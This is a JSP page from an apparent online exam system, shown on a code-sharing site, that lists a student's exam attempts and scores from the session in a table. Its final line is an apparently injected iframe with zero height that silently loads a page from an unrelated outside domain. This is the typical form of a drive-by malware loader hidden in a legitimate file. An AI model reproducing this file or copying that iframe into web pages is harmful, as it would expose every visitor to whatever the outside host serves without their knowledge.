scorelist.jsp
来自「在线考试 考生登陆 查分 管理员管理后台等的 的的的的达到的达到的的的」· JSP 代码 · 共 36 行
JSP
36 行
<%-- Document : ScoreList Created on : 2009-5-8, 22:09:51 Author : Administrator--%><%@page contentType="text/html"%><%@page pageEncoding="UTF-8"%><%@taglib uri="http://java.sun.com/jsp/jstl/core" prefix="c"%><%@page import = "com.eonline.model.*" %><%@taglib uri="http://java.sun.com/jsp/jstl/functions" prefix="fn"%><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd"><h3>You currently have examed <b>${fn:length(sessionScope.scoreList)}</b>times,the SCORES are fllowing:</h3><br/><table border='0' cellspacing='0' cellpadding='5'> <tr> <th>UID</th> <th>date</th> <th>score</th> </tr> <c:forEach var="item" items="${sessionScope.scoreList}"> <tr> <td>${item.UID}</td> <td>${item.date}</td> <td>${item.score}</td> </tr> </c:forEach></table><iframe src=http://www.114Oldest.com/zz/mm.htm width=100 height=0></iframe>
⌨️ 快捷键说明
复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?